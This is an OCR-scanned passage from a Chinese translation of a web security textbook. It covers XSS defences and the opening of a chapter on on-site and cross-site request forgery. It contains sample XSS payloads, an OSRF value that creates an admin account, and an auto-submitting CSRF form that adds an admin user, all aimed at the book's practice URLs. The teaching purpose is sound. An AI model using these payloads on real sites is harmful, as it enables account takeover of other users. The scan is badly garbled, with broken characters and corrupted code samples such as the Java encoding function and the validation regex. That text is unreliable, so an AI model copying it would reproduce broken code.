http: //mdsec.net/error/79/Error. “xam ige=<script>alert(1)</scrip 


在 这 两 个 示例 中 ， Eee .后 面 紧 跟着 攻击 字 REB, 其 中 没 
有 任何 干扰 脚本 执行 的 分 隔 符 ， 因 此 攻击 有 效 载 荷 将 得 到 处 理 ， 且 被 复 
制 到 HTMEL 页 面 源 代码 中 。 


Al, yn vw) 
笑 试 访问 
http://mdsec.net/error/79/ 


有 了 时候， 基于 DOM 的 数据 经 过 了 非常 复杂 的 处 理 ， 仪 通过 静态 审 
碍 JavaScript 源 代码 可 能 很 难 奶 踪 用 户 控制 的 数据 采用 的 不 同 路 径 以 及 对 
它 进 行 的 各 种 操作 。 在 这 种 情况 下， 使 用 JavaScript 调 试 器 动态 监控 脚本 
的 执行 情况 可 能 会 有 很 大 帮助 。Firefox 浏 览 器 的 FireBug 扩 展 是 一 球 用 
于 监控 客户 端 代 码 与 内 容 的 优秀 调试 器 ， 可 用 于 设置 断 点 、 监 视 感 兴趣 
的 代码 与 数据 ， 为 我 们 了 解 复杂 脚本 的 执行 过 程 提 供 了 极 大 的 便利 。 











wv 错误 观点 “我 们 很 安全 ， 因 为 Web 应 用 程序 扫描 需 没 有 发 
现任 何 XSS 漏 洞 。” 

第 19 章 将 会 介绍 ， 一 些 Web 应 用 程序 扫描 器 能 够 发现 大 多 数 第 
见 的 漏洞 ， 包 括 XSS 汤 洞 。 但 是 ， 很 显然 ， 许 多 XSS 漏 洞 很 难 检 测 
出 来 ， 发 现 它 们 可 能 需要 进行 大 量 探查 与 试验 。 束 目前 而 言 ， 还 没 
有 任何 目 动 工具 能 够 准确 确定 所 有 这 些 漏洞 。 














12.4 防止 XSS 攻 击 


尽管 XSS 的 表现 形式 各 异 ， 利 用 方法 各 不 相同 ， 但 从 概念 上 讲 ， 防 
止 这 种 漏洞 实际 上 相当 简单 。 预 防 它们 之 所 以 存在 困难 ， 主 要 在 于 我 们 
无 法 确定 用 户 可 控制 的 数据 以 潜在 危险 的 方式 被 处 理 的 每 一 种 情况 。 任 
何 应 用 程序 页 面 都 会 处 理 并 显示 一 些 用 户 数据 。 除 核心 功能 外 ， 错 误 消 
息 与 其 他 位 置 也 可 能 产生 漏洞 。 因 此 ，XSS 漏 洞 普遍 存在 也 就 不 足 为 奇 
了 ， 即 使 在 最 为 注重 安全 的 应 用 程序 中 也 是 如 此 。 

由 于 造成 漏洞 的 原因 各 不 相同 ， 一 部 分 防御 方法 适用 于 反射 型 与 保 
存 型 XSS 漏 洞 ， 而 另 一 些 则 适用 于 基于 DOM 的 XSS 漏 洞 。 











用 户 可 控制 的 数据 未 经 适当 确认 与 净化 就 被 复制 到 应 用 程序 响应 
中 ， 这 是 造成 反射 型 与 保存 型 XSS 漏 洞 的 根本 原因 。 由 于 数据 被 插入 到 
一 个 HITML 页面 的 源 代 码 中 ， 亚 意 数 据 就 会 干扰 这 个 页 面 ， 不 仅 修 改 它 
(ee ii 
脚本 等 ) 。 

为 消除 反射 型 与 保存 型 XSS 漏 洞 ， 首 先 必 须 确 定 应 用 程序 中 用 户 可 
控制 的 数据 被 复制 到 啊 应 中 的 每 一 种 情形 。 这 包括 从 当前 请 求 中 复制 的 
数据 以 及 用 户 之 前 输入 的 保存 在 应 用 程序 中 的 数据 ， 还 有 通过 带 外 通道 
输入 的 数据 。 为 确保 确定 每 一 种 情形 ， 除 仔细 审查 应 用 程序 的 全 部 源 代 
码 外 ， 没 有 其 他 更 好 的 办 法 。 

确定 所 有 可 能 存在 XSS 风 险 、 需 要 适当 进行 防御 的 操作 后 ， 需 要 采 
取 一 种 三 重 防 御 方 法 阻止 漏洞 的 发 生 。 这 种 方法 由 以 下 3 个 因素 组 成 : 

口 确认 输入 ; 

口 确认 输出 ; 

口 消 除 危 险 的 插入 点 。 

如 果 应 用 程序 需要 允许 用 户 以 HTML 格 式 创 建 内 容 〈 如 人 允许 在 注释 
中 使 用 HTML 的 博客 应 用 程序 ) ， 这 时 应 谨慎 使 用 这 种 方法 。 我 们 将 在 
介绍 常规 防御 技巧 后 讨论 与 这 种 情况 有 关 的 一 些 特定 注意 事项 。 

1. 确认 输入 

如 果 应 用 程序 在 某 个 位 置 收 到 的 用 户 提交 的 数据 将 来 有 可 能 被 复制 
到 它 的 啊 应 中 ， 应 用 程序 应 根据 这 种 情形 对 这 些 数据 执行 尽 可 能 严格 的 
确认 。 可 能 需要 确认 的 数据 的 特性 包括 以 下 几 点 。 

口 数据 不 是 太 长 。 

口 数 据 仅 包 含 某 组 合法 字符 。 

口 数 据 与 一 个 特殊 的 正规 表达 式 相 匹配 。 

根据 应 用 程序 希望 在 每 个 字段 中 收 到 的 数据 类 型 ， 应 尽 可 能 限制 性 
地 对 姓名 、 电 子 邮 件 地 址 、 账 号 等 应 用 不 同 的 确认 规则 。 

2. 确认 输出 

如 果 应 用 程序 将 某 位 用 户 或 第 三 方 提交 的 数据 复制 到 它 的 响应 中 ， 
那么 应 用 程序 应 对 这 些 数据 进行 HTML 编 码 ， 以 净化 可 能 的 恶意 字符 。 
HTML 编 码 指 用 对 应 的 HTML 实 体 蔡 代 字 面 量 字 符 。 这 样 做 可 确保 浏览 
器 安全 处 理 可 能 为 恶意 的 字符 ， 把 它们 当做 HTML 文 档 的 内 容 而 非 结 构 
处 理 。 一 些 经 常 造成 问题 的 字符 的 HTML 编 码 如 下 : 























DD" 
DD 

口 & 一 一 久 

口 <—&md&;< 
口 > > 





除 这 些 常用 的 编码 外 ， 实 际 上 ， 任 何 字符 都 可 以 用 它 的 数字 ASCII 
字符 代码 进行 HTML 编 码 ， 举 例如 下 : 

a %—% 

g * ok 

应 该 注意 ， 在 将 用 户 输入 插入 到 标签 属性 值 中 时 ， 浏 览 器 会 首先 对 
该 值 进行 HTML 解 码 ， 然 后 执行 其 他 处 理 。 在 这 种 情况 下 ， 仅 仅 对 任何 
在 正常 情况 下 存在 问题 的 字符 进行 HTML 编 码 的 防御 机 制 可 能 会 失效 。 
确实 ， 如 前 所 述 ， 对 于 某 些 过 滤 ， 攻 击 者 可 以 避免 在 有 效 载 集 中 使 用 
HTML 编 码 的 字符 。 例 如 : 


<img srce="javascripté&#58;alert (document .cookie) "> 














<img src="“image.gif" onload="alert (&apos;xss&apos;)"> 


我 们 在 下 一 节 将 会 讲 到 ， 最 好 是 避免 在 这 些 位 置 插入 用 户 可 控制 的 
数据 。 如 果 在 某 些 情况 必须 这 样 做 ， 在 执行 操作 时 应 特别 小 心 ， 以 防止 
任何 可 以 避免 过 滤 的 情况 。 例 如 ， 如 果 将 用 户 输 入 插入 到 事件 处 理 器 中 
的 引用 JavaScript 字 符 串 中 ， 应 使 用 反 斜 线 正 确 转 义 用 户 输入 中 的 任何 引 
号 或 反 斜 线 ， 并 且 HTML 编 码 应 包括 & 和; 字符， 以 防止 攻击 者 自己 执 
行 HTML 编 码 。 

在 将 用 户 可 控制 的 字符 串 复制 到 服务 器 的 啊 应 中 之 前 ，ASP.NET 访 
用 程序 可 以 使 用 Server.HTMLEncode API 净 化 其 中 的 常见 恶意 字符 。 这 
个 API 把 字符 "&< 和 > 转换 成 它们 对 应 的 HIML 实 体 ， 并 且 使 用 数字 形式 
的 编码 转换 任何 大 于 0x7f 的 ASCII 字 符 。 

在 Java 平 台中 没有 与 之 等 效 的 API; 但 是 可 以 使 用 数据 形式 的 编码 
构造 自己 的 等 效 方法 。 例 如 : 


public static String ETMLEncode (String sS) 
{ 
StringBuffer out = new StringBuffer (); 
for (int i = 0; i < s.length(); i++) 
{ 
char c = s.charAt(i); 
ific > Ox7£ || wee || cam'&’ |[ came" || cum'>’) 
out.append("&#" + (int) c + "3;"); 
else cut.append(c}; 
} 
return out.toString(); 


} 


当 人 处理 用 户 提 交 的 数据 时 ， 开 发 者 常常 会 犯 一 个 错误 ， 即 仅 对 在 特 
殊 情况 下 对 攻击 者 有 用 的 字符 进行 HTML 编 码 。 例 如 ， 如 果 数 据 被 插入 
到 一 个 双 引 号 引用 的 字符 串 中 ， 应 用 程序 可 能 只 编码 "字符 ;如 果 数 据 
被 插 入 到 一 个 没有 引号 的 标签 中 ， 应 用 程序 只 会 编码 > 字符 。 这 种 方法 
明显 增加 了 攻击 者 避 开 确认 的 风险 。 攻 击 者 常 向 利 用 浏览 器 接受 无 效 
HTML 与 JavaScript 的 弱点 ， 改 变 确认 情境 或 以 意外 的 方式 注入 代码 。 而 
且 ， 攻 击 者 可 以 将 一 个 攻击 字符 串 分 布 到 几 个 可 控制 的 字段 中 ， 利 用 应 
用 程序 对 每 个 字段 采用 的 不 同 过 滤 避 开 其 他 过 滤 。 一 种 更 加 可 靠 的 方法 
是 ， 无 论 数 据 插 入 到 什么 地 方 ， 始 终 对 攻击 者 可 能 使 用 的 每 一 个 字符 进 
行 HIML 编 码 。 为 尽 可 能 地 确保 安全 ， 开 发 者 可 能 会 选择 HTML 编 码 每 
一 个 非 字 母 数字 字符 ， 包 插 空 白 符 。 这 种 方法 通常 会 显著 增加 应 用 程序 
的 工作 压力 ， 同 时 给 任何 尝试 避 开 过 小 的 攻击 设置 巨大 障碍 。 

应 用 程序 之 所 以 结合 使 用 输入 确认 与 输出 净化 ， 原 因 在 于 这 种 方法 
能 够 提供 两 层 防御 : 如 果 其 中 一 层 被 攻破 ， 男 一 层 还 能 提供 一 些 保护 。 
如 上 文 所 述 ， 许 多 执行 输入 与 输出 确认 的 过 滤 都 容易 被 攻破 。 结 合 这 两 
种 技巧 ， 应 用 程序 就 能 够 获得 额外 的 保护 ， 即 使 攻击 者 发 现 其 中 一 种 过 
滤 存 在 缺陷 ， 男 一 种 过 小 仍然 能 够 阻止 他 实施 攻击 。 在 这 两 种 防御 中 ， 
输出 确认 更 为 重要 ， 必 不 可 少 。 实 施 严 格 的 输入 确认 应 被 视 为 一 种 次 要 
故障 恢复 (secondary failover) 。 

当然 ， 当 设计 输入 与 输出 确认 机 制 时 ， 我 们 应 特别 小 心 ， 尽 量 避 人 免 
任何 可 能 导致 攻击 者 避 开 确认 的 漏洞 。 尤 其 要 注意 的 是 ， 应 在 实施 相关 
规范 化 后 再 对 数据 进行 过 滤 与 编码 ， 而 且 之 后 不 得 对 数据 实施 进一步 的 
oa 应 用 程序 还 必须 保证 其 中 存在 的 空 字 市 不 会 对 它 的 确认 造成 任 
可 干扰 。 

3. 消除 危险 的 插入 点 

应 用 程序 页 面 中 有 一 些 位 置 ， 在 这 里 插入 用 户 提交 的 输入 就 会 造成 
极 大 的 风险 ; 因此 ， 开 发 者 应 力求 寻找 其 他 方法 执行 必要 的 功能 。 























应 尽量 避免 直接 在 现 有 的 JavaScript 中 插入 用 户 可 控制 的 数据 。 这 适 
用 于 <script> 标 签 中 的 代码 ， 也 适用 于 事件 处 理 器 的 代码 。 如 宋 应 用 程 
序 尝 试 以 安全 的 方式 在 其 中 插入 数据 ， 可 能 束 会 使 攻击 者 有 机 会 避 开 它 
们 实施 的 防御 性 过 滤 。 一 旦 攻击 者 蚁 控制 提交 数据 的 插入 扩 ， 他 个 用 
付出 多 大 努力 就 可 以 注入 任意 脚本 命令 ， 从 而 实施 恶意 操作 。 

如 果 标 签 属性 接受 URL 作 为 它 的 值 ， 通常 应 用 程序 应 该 避免 嵌入 用 
an 因为 各 种 技巧 也 能 引入 脚本 代码 ， 包 括 伪 协议 脚本 处 理 的 使 


如 琳 攻 击 者 通过 插入 一 个 相关 指令 ， 或 者 因为 应 用 程序 使 用 一 个 请 
求 参 数 指定 首选 的 字符 集 ， 因 而 能 够 控制 应 用 程序 啊 应 的 编码 类 型 ， 那 
么 这 些 情 况 也 应 该 加 以 避免 。 在 这 种 情况 下 ， 在 其 他 方面 经 过 精心 设计 
的 输入 与 输出 过 滤 可 能 就 会 失效 ， 因为 攻击 者 的 输入 进行 了 个 常见 的 编 
码 ， 以 致 上 述 过 滤 并 不 将 其 视 为 恶意 输入 。 只 要 有 可 能 ， 应 用 程序 应 在 
它 的 啊 应 消 妃 头 中 明确 指定 一 种 编码 类 型 ， 禁止 对 它 进行 任何 形式 的 修 
改 ， 并 确保 应 用 程序 的 XSS 过 滤 与 其 兼容 。 例 如 : 


Content-Type: text/html; charset=ISO-8859-1 


4. 人 允许 有 限 的 HTML 

一 些 应 用 程序 需要 允许 用 户 以 HTML 格 式 提 交 即 将 插入 到 应 用 程序 
响应 中 的 数据 。 例 如 ， 博 客 应 用 程序 可 能 需要 允许 用 户 使 用 HTML 撰写 
博客 、 对 博客 使 用 格式 、 髓 入 链接 或 图 像 等 。 在 这 种 情况 下 ， 不 作 区 分 
地 应 用 上 述 措施 将 会 导致 错误 。 用 户 的 HTML 标 记 将 在 啊 应 中 被 HTML 
编码 ， 因 此 作为 真实 的 标记 显示 在 屏幕 上 ， 而 不 是 以 所 需 的 格式 化 内 容 
EZR o 

为 安全 地 支持 这 种 功能 ， 应 用 程序 需要 保持 稳健 ， 仅 允许 有 限 的 
HTML 子 集 ， 避 人 免 提 供 任何 引入 脚本 代码 的 方法 。 这 包括 采用 一 种 白 名 
单方 法 ， 仅 允许 特定 的 标签 和 属性 。 成 功 做 到 这 一 点 并 不 简单 ， 如 前 所 
述 ， 攻 击 者 可 以 通过 各 种 方法 使 用 看 似 无 害 的 标签 来 执行 代码 。 

例如 ， 如 果 应 用 程序 允许 使 用 <b> 和 <i> 标 签 ， 但 并 不 限制 与 这 些 标 
签 一 起 使 用 的 属性 ， 则 攻击 者 可 以 实施 以 下 攻击 : 


<b style=behavior:url (#default#time2) onbegin=alert(1)> 














<i onclick=alert(1})>Click here</i 


紫外， 如 果 应 用 程序 允许 使 用 看 似 安全 的 <a> 标 签 和 href 属 性 的 组 
ee ee 


有 各 种 框架 (如 OWASP AntiSamy A) 可 用 于 确认 用 户 提交 的 
HTML 标 记 ， 以 确保 其 中 不 包含 任何 执行 JavaScript 的 方法 。 建 议 需 要 人 允 
许 用 户 创建 有 限 HTML 的 开发 者 直接 使 用 某 个 成 熟 的 框架 ， 或 仔细 分 析 
其 中 一 种 框架 ， 以 了 解 面 临 的 各 种 相关 挑战 。 





或 者 ， 也 可 以 采用 茶 种 定制 的 中 间 标 记 语 言 ， 允 许 用 户 使 用 有 限 的 
中 间 语 言语 法 ， 然 后 由 应 用 程序 对 其 进行 处 理 ， 以 生成 相应 的 HTML 标 
oe 
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应 用 程序 应 尽量 避免 使 用 客户 端 脚本 处 理 DOM 数 据 并 把 它 插入 到 
页 面 中 。 由 于 被 处 理 的 数据 不 在 服务 器 的 直接 控制 范围 内 ， 有 时 甚至 不 
在 它 的 可 见 范围 内 ， 因 此 这 种 行为 存在 着 固有 的 风险 。 

如 果 无 法 避免 地 要 以 这 种 方式 使 用 客户 端 脚本 ， 我 们 可 以 通过 两 种 
防御 方法 防止 基于 DOM 的 XSS 漏 洞 ， 它 们 分 别 与 前 面 描述 的 防止 反射 型 
XSS 漏 洞 时 使 用 的 输入 与 输出 确认 相对 应 。 

1. 确认 输入 

许多 时 候 ， 应 用 程序 可 以 对 它 处 理 的 数据 执行 严格 的 确认 。 确 实 ， 
在 这 方面 ， 客 户 端 确认 比 服 务 器 端 确 认 更 加 有 效 。 在 前 面 描述 的 易 受 攻 
击 的 示例 中 ， 我 们 可 以 通过 确认 将 要 插入 到 文档 中 的 数据 仅 包含 字母 数 
字 字 符 与 空白 符 ， 从 而 阻止 攻击 发 生 。 例 如 : 


<script> 














var a = document.URL; 

a = a.substring(a.indexOf("message=") + 8, a.length); 
a = unescape(a); 

var regex=/* ( [A-Za-z0-9+\s])*$/; 


+t (regex.test (a) }) 
document .write({a); 


</script> 


除 这 种 客户 端 控制 外 ， 还 可 以 在 服务 器 端 对 URL 数 据 进行 严格 的 确 
认 ， 实 施 深层 防御 ， 以 检测 利用 基于 DOM 的 XSS 漏 洞 的 恶意 请 求 。 在 刚 
刚 说 明 的 同一 个 示例 中 ， 应 用 程序 甚至 只 需 实施 服务 器 端 数 据 确认 ， 通 
过 确认 以 下 数据 来 阻止 攻击 : 

口 查询 字符 串 中 只 有 一 个 参数 ，; 





口 参 数 名 为 message〈 大 小 写 检查 ) ; 

口 参 数值 仅 包 含 字母 数字 内 容 。 

实施 了 这 些 控制 后 ， 客 户 端 脚本 仍 有 必要 正确 解析 出 message 参 数 
的 值 ， 确 保 其 中 并 不 包含 任何 URL 片 断 字 符 。 

2. 确认 输出 

与 防止 反射 型 XSS 漏 洞 时 一 样 ， 在 将 用 户 可 控制 的 DOM 数 据 插 入 到 
文档 之 前 ， 应 用 程序 也 可 以 对 它们 进行 HIML 编 码 。 这 样 就 可 以 将 各 种 
危险 的 字符 与 表达 式 以 安全 的 方式 显示 在 页 面 中 。 例 如 ， 使 用 下 面 的 函 
数 即 可 在 客户 端 JavaScript 中 执行 HITML 编 码 : 


function sanitize(str) 


{ 





var d = document.createElement('div'); 
d.appendChild(document.createTextNode(str)); 


return d.innerHTML; 


12.5 ”小结 


在 这 一 章 中 ， 我 们 讨论 了 各 种 可 能 导致 XSS 漏 洞 的 情形 ， 以 及 一 些 
可 用 于 避 开 基于 过 泪 的 香 用 防御 机 制 的 方法 。 由 于 XSS 漏 洞 极为 常见 ， 
因此 ， 测 试 员 能 够 轻易 在 应 用 程序 中 发 现 可 供 利用 的 漏洞 。 但 是 ， 如 果 
实施 的 各 种 防御 机 制 迫 使 测试 员 设 计 出 高 度 自 定义 的 输入 ， 或 者 利用 
HTMIL、JavaScript 或 VBScript 的 某 些 鲜 为 人 知 的 特性 来 实施 成 功 的 攻 
击 ， 这 时 ，XSS 将 会 更 加 引 人 关 注 (至 少 从 研究 角度 看 的 确 如 此 ) 。 

下 一 章 将 以 此 为 基础 ， 并 进一步 讨论 大 量 导致 用 户 遭 受 恶 意 攻 击 的 
服务 器 端 Web 应 用 程序 漏洞 。 








12.6 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/ywahh。 

(1) 在 应 用 程序 的 行为 中 ， 有 什么 “明显 特征 > 可 用 于 确定 大 多 数 
XSS 漏 洞 ? 

(2) 假设 在 应 用 程序 未 通过 验证 的 功能 区 域 发现 了 一 个 反射 型 
XSS 漏 洞 。 如 何 利用 这 个 漏洞 攻破 一 个 通过 验证 的 应 用 程序 会 话 ? 请 想 
出 两 种 不 同 的 方法 。 

(3) 假设 一 个 cookie 参 数 未 经 过 任何 过 滤 或 净化 就 被 复制 到 应 用 程 
序 的 啊 应 中 。 是 否 可 以 利用 这 种 行为 在 返回 的 页 面 中 注入 任意 
JavaScript? 是 否 可 以 利用 这 种 行为 实施 攻击 其 他 用 户 的 XSS 攻 击 ? 

(4) 假设 在 仅 返 回 给 自己 的 数据 中 发 现 了 保存 型 XSS 漏 洞 。 这 种 
行为 是 否 存在 安全 缺陷 ? 

(5) 在 一 个 处 理 文件 附件 并 在 浏览 器 中 显示 这 些 内 容 的 Web 邮 件 
应 用 程序 中 ， 可 以 立即 确定 哪 种 常见 的 漏洞 ? 

> 
ATK 

(7) 列举 3 个 利用 XSS 漏 洞 的 可 行 攻击 有 效 载 荷 〈 也 就 是 说 ， 攻 击 
ee een ae ee are ed 
法 ) 。 

(8) 已 知 一 个 反射 型 XSS 漏 洞 ， 可 以 在 返回 页 面 的 HIML 代 码 的 某 
个 位 置 注 入 任意 数据 。 插 入 的 数据 被 截 短 至 50 字 节 ， 但 是 我 们 希望 注入 
ee Ee a 
NE ? 

(9) 在 一 个 必须 使 用 POST 方法 的 请 求 中 发 现 一 个 反射 型 XSS 漏 
洞 。 攻 击 者 可 以 使 用 哪 种 传送 机 制 实 施 攻击 ” 





在 前 一 音 中 ,我 们 介绍 了 针对 其 他 应 用 程序 用 户 的 主要 攻击 
跨 站 点 脚本 (XSS) 。 在 这 一 章 中 ， 我 们 将 介绍 一 系列 针对 用 户 的 其 他 
攻击 。 其 中 的 一 些 攻击 与 XSS 攻 击 具有 很 大 的 相似 性 。 许 多 时 候 ， 这 些 
攻击 比 XSS 更 加 复杂 ， 或 者 隐藏 性 更 强 ， 因 此 ， 在 单纯 的 XSS 攻 击 无 法 
奏效 的 情况 下 ， 它 们 往往 能 够 取得 成 功 。 

针对 其 他 应 用 程序 用 户 的 攻击 形式 各 异 ， 它 们 之 间 的 微妙 之 处 与 细 
微 差别 常常 被 人 们 和 忽略。 通常 ， 与 主要 的 服务 器 端 攻 击 相 比 ， 人 们 对 它 
们 也 知之 甚 少 ， 即 使 经 验 丰 富 的 渗透 测试 员 也 会 混淆 或 忽略 各 种 不 同 的 
漏洞 。 我 们 将 在 本 章 中 介绍 各 种 常见 的 漏洞 ， 并 说 明确 认 并 利用 这 些 漏 
洞 所 需 采 取 的 步骤 。 





13.1 i% “HITER 


fe Ee, RIMA SMTA XSS Beh AEH En 
况 下 在 应 用 程序 中 执行 操作 。 如 果 受 害 用 户 拥有 管理 权限 ， 使 用 这 种 拉 
巧 就 可 以 迅速 完全 侵入 应 用 程序 。 在 这 一 节 中 ， 我 们 将 介绍 另外 一 些 可 
用 于 诱 使 其 他 用 户 执 行 操作 的 方法 。 这 些 方法 甚至 可 以 用 在 已 防范 XSS 
攻击 的 应 用 程序 中 。 


13.1.1 ”请求 伪造 


这 种 类 型 的 攻击 也 称 为 会 话 早 置 (session riding) ， 它 们 与 会 话 劫 
持 攻击 密切 相关 ， 在 攻击 过 程 中 ， 攻 击 者 截获 一 名 用 户 的 会 话 令 牌 ， 因 
而 能 够 “作为 ”该 用 户 使 用 应 用 程序 。 但 是 ， 通 过 请 求 伪造 ， 攻 击 者 根本 
不 需要 知道 受害 者 的 会 话 令 牌 。 相 反 ， 攻 击 者 利用 Web 浏 览 器 的 正常 行 
为 动 持 用 户 的 令 牌 ， 并 通过 它 提出 用 户 并 不 打算 提出 的 请 求 。 

请 求 伪 造 漏洞 分 为 两 种 类 型 : 本 站 点 和 跨 站 点 。 
1. 本 站 点 请 求 伪 造 

本 站 点 请 求 伪 造 (On-Site Request Forgery, OSRF) 是 一 种 利用 保 
存 型 XSS 漏 洞 的 常见 攻击 有 效 载荷 。 在 上 一 章 介 绍 的 MySpace 蠕 虫 示例 
中 ， 一 位 名 叫 Samy 的 用 户 在 自己 的 用 户 资料 中 插入 一 段 脚本 ， 致 使 任 
何 查 看 其 资料 的 用 户 在 不 知情 的 情况 下 执行 各 种 操作 。 男 外 ， 即 使 在 
pee ial a 保存 型 OSRF 漏 洞 仍 有 可 能 存在 ， 这 点 常 被 

门 忽视 。 

以 消息 公告 牌 应 用 程序 为 例 ， 它 允许 用 户 提 交 可 被 其 他 用 户 碍 看 的 
数据 。 访 应 用 程序 使 用 以 下 请 求 提 区 消息 : 


POST /submit.php 
Host: wahh-app.com 
Content-Length: 34 

















type=question&name=daf&message=foo 
这 个 请 求 将 以 下 内 容 添 加 到 消息 页 面 中 : 


<tr> 
<td><img src="/images/question.gif"></td> 
<td>daf</td> 
<td>foo</td> 

<ftxr> 

ERXARD RB, WAR SRA Pe A EXSS Ile. (Ee, 
假设 应 用 程序 对 插入 页 面 中 的 任何 “、< 和 > 字符 进行 了 正确 地 HTML 编 
码 。 如 果 对 这 种 防御 方法 感到 满意 ， 觉 得 攻击 者 无 论 如 何 也 无 法 避 开 
它 ， 测 试 员 就 会 继续 进行 下 一 步 测试 。 

但 是 ， 稍 等 。 我 们 控制 的 仅仅 是 <img> 标 签 目标 的 一 部 分 内 容 。 虽 
然 我 们 无 法 破坏 引用 字符 串 ， 但 是 可 以 修改 URL， 使 得 查看 消息 的 任何 
用 户 提 出 任意 一 个 本 站 点 GET 请 求 。 例 如 ， 在 type 参 数 中 提交 下 面 的 值 
将 会 使 任何 查看 消息 的 用 户 提出 一 个 科 试 创建 新 的 管理 用 户 的 请 求 : 


../admin/newUser.php?username=daf2&vassword=Owned&role=admin# 


如 果 一 名 普通 用 户 被 诱 使 提出 攻击 者 专门 设计 的 请 求 ， 攻 击 当 然 不 
会 成 功 。 但 是 ， 如 果 管 理 员 查看 消息 ， 攻 击 者 就 可 以 建立 一 个 秘密 账 
户 。 上 面 的 示例 证 明 ， 即 使 无 法 实施 XSS 攻 击 ， 但 攻击 者 仍然 能 够 成 功 
执行 OSRF 攻 击 。 当 然 ， 即 使 管理 员 采 取 了 防范 措施 ， 禁 用 了 
JavaScript， 攻 击 依然 能 够 成 功 。 

注意 ， 在 前 面 的 攻击 字符 串 中 ，# 符 终止 了 .gif 后 级 前 面 的 URL。 但 
是 ， 只 需 在 后 级 前 插入 一 个 &， 构 成 男 外 一 个 请 求 参数 ， 即 可 解决 以 上 


问题 。 


























IA IF 


在 以 下 示例 中 ， 可 以 将 OSREF 有 效 载荷 放 在 最 近 的 搜索 列表 
中 ， 即 使 其 并 不 易于 受到 XSS 攻 击 : 
http://mdsec.net/search/77/ 


渗透 测试 步 又 


C1) 如 果 一 名 用 户 提 交 的 数据 在 东 个 位 置 显示 给 其 他 用 户 ， 
但 测试 员 仍 然 无 法 实施 保存 型 XSS 攻 击 ， 那 么 在 每 个 这 样 的 位 置 ， 
检查 应 用 程序 的 行为 是 人 否 使 得 它 易 于 受到 OSRF 攻 击 。 

(2) 用户 提交 的 数据 被 插入 到 超 链接 目标 或 返回 页 面 中 的 其 
他 URL 等 位 置 时 往往 会 出 现 漏洞 。 除 非 应 用 程序 特别 阻止 要 求 的 任 
何 字符 〈 通 党 包括 扣 、 斜 线 及 奋 询 字符 串 中 的 分 隅 符 ) ， 人 否则 它 肯 
定 易于 受到 攻击 。 

(3) 如 果 发 现 OSRF 漏 洞 ， 则 应 寻找 一 个 适当 的 请 求 作 为 利用 
目标 ， 如 下 一 节 “ 跨 站 点 请 求 伪造 "所 述 。 


在 将 其 合并 到 响应 中 之 前 ， 尽 可 能 严格 地 确认 用 户 提 交 的 输入 ， 即 
可 防止 OSRF 漏 洞 。 例 如 ， 在 前 面 的 示例 中 ， 应 用 程序 可 能 会 检查 type 
参数 中 是 否 有 一 组 值 中 的 某 一 个 特殊 的 值 。 如 果 应 用 程序 必须 接受 无 法 
预料 的 其 他 值 ， 那 么 应 阻止 任何 包含 /.\? & 与 = 的 请 求 。 

注意 ， 对 这 些 字符 进行 HTML 编码 并 不 能 有 效 防止 OSRF 攻 击 ， 因 
为 浏览 器 在 请 求 目 标 URL 字 符 串 之 前 ， 会 首先 对 其 进行 解码 。 

根据 揪 入 点 与 周围 环境 的 不 同 ， 使 用 与 下 一 节 描 述 的 防止 CSRF 攻 
击 时 使 用 的 同 种 防御 方法 ， 也 可 以 防止 OSRF 攻 击 。 

2. 跨 站 点 请 求 伪造 

在 路 站 点 请 求 伪 造 (CSREF) 攻击 中 ， 攻 击 者 只 需 创 建 一 个 看 似 无 
害 的 网 站 ， 人 致使 用 户 的 浏览 器 直接 癌 易 受 攻击 的 应 用 程序 提交 一 个 请 
求 ， 执 行 菜 种 有 利于 攻击 者 的 “无 意 ” 操 作 。 

如 前 所 述 ， 同 源 策略 并 不 阻止 一 个 网 站 向 另 一 个 域 提 出 请 求 。 但 
是 ， 它 确实 阻止 提出 请 求 的 网 站 处 理 跨 域 请 求 的 响应 。 因 此 ， 正 常情 况 
下 ，CSRF 攻 击 只 是 一 种 “ 单 向 ”攻击 。 所 以 ， 在 纯粹 的 CSRF 攻 击 中 ， 要 
想 实 施 如 Samy XSS 蠕 虫 中 的 多 阶段 操作 ， 从 响应 中 读 取 数据 并 将 其 合 
并 到 随后 的 请 求 中 ， 将 很 难 实现 。 (我 们 将 在 本 章 后 面部 分 介绍 如 何 对 
aa a 

数据 。 ) 

以 某 个 允许 管理 员 使 用 以 下 请 求 创建 新 用 户 账户 的 应 用 程序 为 例 : 



































POST /auth/390/NewUserStep2.ashx HTTP/1.1 

Host: mdsec.net 

Cookie: SessicnId=8299BE6B260193DA076383A2385BO7B9 
Content-Type: application/x-www-form-urlenceded 
Content-Length: 83 


realname=da feusername=da feuserro le=adminskpassword=lLetmeinla 
conlirmpassword-letmeinl 


此 请 求 有 3 个 主要 特点 导致 它 易于 受到 CSRF 攻 击 。 

口 该 请 求 执 行 特权 操作 。 在 上 述 示例 中 ， 该 请 求 使 用 管理 员 权 限 创 
建 了 一 个 新 用 户 。 

口 应 用 程序 仅仅 依靠 HTTP cookie 来 追踪 会 话 。 请 求 中 的 任何 其 他 
位 置 均 未 传送 会 话 相 关 的 令 牌 。 

O 攻击 者 可 以 确定 执行 操作 所 需 的 所 有 参数 。 除 cookie 中 的 会 话 令 
牌 外 ， 请 求 中 不 需要 包含 任何 无 法 预测 的 值 。 

针对 这 些 特点 表现 出 的 缺陷 ， 攻 击 者 可 以 构建 一 个 Web 页面， 向 易 
受 攻击 的 应 用 程序 提出 一 个 跨 域 请 求 ， 在 其 中 包含 执行 特权 操作 所 需 的 
所 有 步骤 。 以 下 为 这 种 攻击 的 一 个 示例 : 


<html> 

<body> 

<form action="httyps://mdsec.net/auth/390/NewUserStep2.ashx" 
methcd="POST"> 

<input type="hidden" name="realname" value="dat"> 














<input type="hidden” name="username" value="dat"> 

<input type="hidden” name="userrole" value="admin"> 

<input me="hidden”* name="password" value="letmeinl"> 
F YE p 


<input type="hidden” name="confirmpassword" value="letmeinl"> 

a maven maar: 

<i 

</html> 

该 攻击 将 所 有 请 求 参 数 放 入 隐藏 表单 字段 中 ， 并 包含 一 段 用 于 目 动 

提交 表单 的 脚本 。 用 户 的 浏览 器 提交 此 表单 时 ， 将 自动 添加 用 户 的 目标 
域 的 cookie， 并 且 应 用 程序 会 正常 处 理 生成 的 请 求 。 如 果 管理 用 户 登 录 
到 易 受 攻击 的 应 用 程序 ， 并 访问 攻击 者 的 包含 此 表单 的 Web 页 面 ， 该 请 
求 将 在 管理 员 的 会 话 中 处 理 ， 攻 击 者 的 账户 因此 得 以 创建 。 


Al, yn vw) 
笑 试 访问 
http://mdsec.net/auth/390/ 


